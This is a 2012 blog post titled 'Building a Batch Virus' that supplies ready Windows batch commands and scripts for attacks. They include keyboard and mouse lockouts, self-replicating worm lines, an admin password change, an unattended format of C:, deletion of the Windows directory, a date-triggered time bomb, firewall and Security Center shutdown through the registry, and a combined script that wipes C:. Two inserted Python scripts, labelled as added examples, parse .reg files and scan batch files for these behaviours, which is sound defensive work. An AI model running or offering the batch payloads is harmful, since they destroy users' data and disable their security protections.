Thursday, 16 February 2012

Building a Batch Virus

In DOS, OS/2 and Microsoft Windows, a batch file is a text file containing a series of commands intended to be executed by the command interpreter. When a batch file is run, the shell program (usually COMMAND.COM or cmd.exe) reads the file and executes its commands. Batch files are useful for running a sequence of executables automatically and are often used to automate repetitive or tedious processes.

DOS batch files have the filename extension .bat. Batch files for other environments may have different extensions, e.g. .cmd or .bat in the Microsoft Windows NT family of operating systems and OS/2, or .btm in 4DOS- and 4NT-related shells. The Windows 9x family of operating systems only recognizes the .bat extension.

Example Commands

Swap mouse buttons:

rundll32 user,swapmousebutton

Open the URL you want:

start http://www.google.com

Shut down the computer and show any message you want:

shutdown -s -t 10 -c "YOUR MESSAGE HERE" -f

Disable mouse till next restart:

rundll32 mouse,disable

Disable keyboard till next restart:

rundll32 keyboard,disable

Freezes the computer till restart:

rundll32 user,disableoemlayer

=======================================================================


Worm commands:

These two lines copy the running batch file into every .bat file in the same directory.

ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul

Clears another batch file's source and copies itself into it.

%0 >>other.bat

=======================================================================


Trojan Codes:

Writes a list of the files in the same directory into a text file (Filelist.txt) in that directory.

dir *.*>>Filelist.txt

Changes a specific user account's password to whatever you want.

net user administrator PASSWORD HERE

Creates a text file with IP address information in the same directory as the batch file.

ipconfig >Computer-IP-address.txt

Copies itself to the AutoRun section of Windows.

COPY %0 %windir%\WINSTART.BAT

Formats the C: drive without asking.

format c: /q /autotest

Deletes Windows.

DELTREE /Y %windir%

Deletes the C: drive. /F means forced, /S deletes the whole tree, and /Q makes it quiet so it does not ask permission.

DEL /F /S /Q C:

This is a potential time-bomb virus; remember to change the date!

@echo off
echo. | date | find /c /i "2005.05.10" > NUL
If errorlevel 1 GoTo End
YOUR 'VIRUS' CODE HERE.
:End

The following will turn off the firewall and stop the Security Center.

net stop "Security Center"
net stop SharedAccess
> "%Temp%\kill.reg" ECHO REGEDIT4
>>"%Temp%\kill.reg" ECHO.
>>"%Temp%\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%\kill.reg" ECHO.
>>"%Temp%\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
>>"%Temp%\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%\kill.reg" ECHO.
>>"%Temp%\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
>>"%Temp%\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%\kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%\kill.reg"
del "%Temp%\kill.reg"
del %0
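Before a .reg file like the one written above is imported, a defender wants to know what it changes. The following Python script is an added example, not code from the original post: it parses REGEDIT4-style text and reports which of the firewall, Automatic Updates and Security Center services the file would set to Start=4 (disabled). The watched service names, their descriptions and the sample .reg text are assumptions constructed for this example from the keys shown on this page.

```python
# Added example (not from the original post): a parser for the REGEDIT4-style
# .reg text that the script above writes, used to report which services the
# file would set to Start=4 (SERVICE_DISABLED) before anyone imports it.
import re
from typing import Dict, List, Tuple

# Assumption: these three service names are the ones the page's .reg file
# targets; the descriptions are the display names used on Windows XP.
WATCHED_SERVICES = {
    "sharedaccess": "Windows Firewall / Internet Connection Sharing",
    "wuauserv": "Automatic Updates",
    "wscsvc": "Security Center",
}
SERVICE_DISABLED = 4  # Start value that prevents the service from being started

_KEY_RE = re.compile(r"^\[(.+)\]$")
_VALUE_RE = re.compile(r'^(?:"([^"]+)"|(@))=(.*)$')
_SERVICE_KEY_RE = re.compile(r"\\Services\\([^\\\]]+)$", re.IGNORECASE)
_DWORD_RE = re.compile(r"^dword:([0-9a-fA-F]{1,8})$")


def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Parse .reg text into {key path: {value name: raw value}}.

    Handles the REGEDIT4 header, blank lines, ';' comments, '[key]' sections
    and '"name"=value' / '@=value' lines. Values are kept as the raw
    right-hand side (e.g. 'dword:00000004').
    """
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith(("REGEDIT4", "Windows Registry Editor")):
            continue
        key_match = _KEY_RE.match(line)
        if key_match:
            current = key_match.group(1)
            keys.setdefault(current, {})
            continue
        value_match = _VALUE_RE.match(line)
        if value_match and current is not None:
            name = value_match.group(1) or "@"
            keys[current][name] = value_match.group(3)
    return keys


def disabled_services(reg_text: str) -> List[Tuple[str, str]]:
    """Return (service, description) for every watched service the file disables."""
    findings = []
    for key, values in parse_reg(reg_text).items():
        svc_match = _SERVICE_KEY_RE.search(key)
        if not svc_match:
            continue
        service = svc_match.group(1).lower()
        dword = _DWORD_RE.match(values.get("Start", ""))
        if dword and int(dword.group(1), 16) == SERVICE_DISABLED and service in WATCHED_SERVICES:
            findings.append((service, WATCHED_SERVICES[service]))
    return findings


# Constructed sample: the same keys the script above writes, plus one benign
# key (Spooler left at Start=2, i.e. automatic) to show it is not reported.
SAMPLE_REG = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler]
"Start"=dword:00000002
"""

if __name__ == "__main__":
    for service, description in disabled_services(SAMPLE_REG):
        print(f"would disable {service} ({description})")
```

The check keys on the service name at the end of the key path, so it catches the same change whether it is written under CurrentControlSet or under a numbered ControlSet00N, as the page's script does for wscsvc.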

This code is also a Time-Bomb

@echo off
cls
rundll32 mouse,disable
rundll32 keyboard,disable
COPY %0 %windir%\WINSTART.BAT
net stop "Security Center"
net stop SharedAccess
echo You got owned!!!
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
start http://www.fbi.gov
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
> "%Temp%\kill.reg" ECHO REGEDIT4
>>"%Temp%\kill.reg" ECHO.
>>"%Temp%\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%\kill.reg" ECHO.
>>"%Temp%\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
>>"%Temp%\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%\kill.reg" ECHO.
>>"%Temp%\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
>>"%Temp%\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%\kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%\kill.reg"
del "%Temp%\kill.reg"
del %0
DEL /F /S /Q C:
shutdown -s -t 10 -c "Your computer is destroyed" -f
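Every behaviour on this page (the rundll32 lockouts under Example Commands, the self-copying worm lines, the Trojan commands, the date-triggered time bomb and the combined script above) leaves a recognisable fingerprint in the batch text itself. The following Python script is an added example, not code from the original post: a static scanner that reads a .bat file and reports which of those behaviours each line matches, so a suspicious file found in a startup location can be triaged without being run. The rule labels and the sample batch text are assumptions constructed for this example from the commands listed on this page.

```python
# Added example (not from the original post): a static scanner that reads batch
# file text and reports lines matching the behaviours listed on this page, so a
# defender can triage a suspicious .bat without executing it.
import re
from typing import List, Tuple

# (label, pattern). Every pattern is derived from a command shown on the page;
# the labels are this example's own wording.
RULES = [
    ("self-replication: prepends %0 to other .bat files",
     re.compile(r"\bcopy\s+%0\+", re.I)),
    ("self-replication: appends own output to another .bat",
     re.compile(r"^\s*%0\s*>>", re.I)),
    ("input lockout: rundll32 disables mouse or keyboard",
     re.compile(r"rundll32\s+(mouse|keyboard)\s*,\s*disable", re.I)),
    ("system freeze: rundll32 user,disableoemlayer",
     re.compile(r"rundll32\s+user\s*,\s*disableoemlayer", re.I)),
    ("persistence: writes itself to WINSTART.BAT",
     re.compile(r"\bcopy\s+%0\b.*winstart\.bat", re.I)),
    ("stops a security service",
     re.compile(r'net\s+stop\s+("security center"|sharedaccess|wscsvc|wuauserv)', re.I)),
    ("writes a .reg entry that sets a service to disabled (Start=4)",
     re.compile(r'"Start"=dword:0*4\b', re.I)),
    ("silent registry import",
     re.compile(r"\bregedit\s+/s\b", re.I)),
    ("destructive: forced recursive delete of a drive root",
     re.compile(r"\bdel\s+(?:/[fsq]\s+){1,3}[a-z]:\\?\s*$", re.I)),
    ("destructive: unattended format",
     re.compile(r"\bformat\s+[a-z]:.*\s/autotest\b", re.I)),
    ("destructive: removes the Windows directory",
     re.compile(r"\bdeltree\s+/y\s+%windir%", re.I)),
    ("logic bomb: runs only on a hard-coded date",
     re.compile(r'\bdate\s*\|\s*find\s+/c\s+/i\s+"\d{4}\.\d{2}\.\d{2}"', re.I)),
    ("anti-forensics: deletes its own file",
     re.compile(r"^\s*del\s+%0\s*$", re.I)),
    ("changes an account password",
     re.compile(r"\bnet\s+user\s+\S+\s+\S+", re.I)),
]

# Label prefixes that on their own justify a "malicious" verdict.
DESTRUCTIVE = ("destructive", "self-replication", "persistence")


def scan_batch(text: str) -> List[Tuple[int, str]]:
    """Return (1-based line number, rule label) for every matching line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, pattern in RULES:
            if pattern.search(line):
                findings.append((lineno, label))
    return findings


def verdict(findings: List[Tuple[int, str]]) -> str:
    """Collapse the findings into clean / suspicious / malicious."""
    if any(label.startswith(DESTRUCTIVE) for _, label in findings):
        return "malicious"
    if findings:
        return "suspicious"
    return "clean"


# Constructed sample: a shortened version of the page's final script, plus one
# harmless line (the directory listing) to show that it is not flagged.
SAMPLE_BAT = r"""@echo off
cls
rundll32 mouse,disable
COPY %0 %windir%\WINSTART.BAT
net stop "Security Center"
>>"%Temp%\kill.reg" ECHO "Start"=dword:00000004
START /WAIT REGEDIT /S "%Temp%\kill.reg"
echo. | date | find /c /i "2005.05.10" > NUL
del %0
DEL /F /S /Q C:
dir *.*>>Filelist.txt
"""

if __name__ == "__main__":
    hits = scan_batch(SAMPLE_BAT)
    for lineno, label in hits:
        print(f"line {lineno}: {label}")
    print("verdict:", verdict(hits))
```

The scanner is line-based on purpose: the commands on this page are each a single line, and a signature list like this is easy to extend with one (label, regex) pair per new behaviour. Lines that only write or delete a temporary .reg file are not flagged by themselves; what is flagged is the Start=4 entry and the silent regedit import that applies it.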

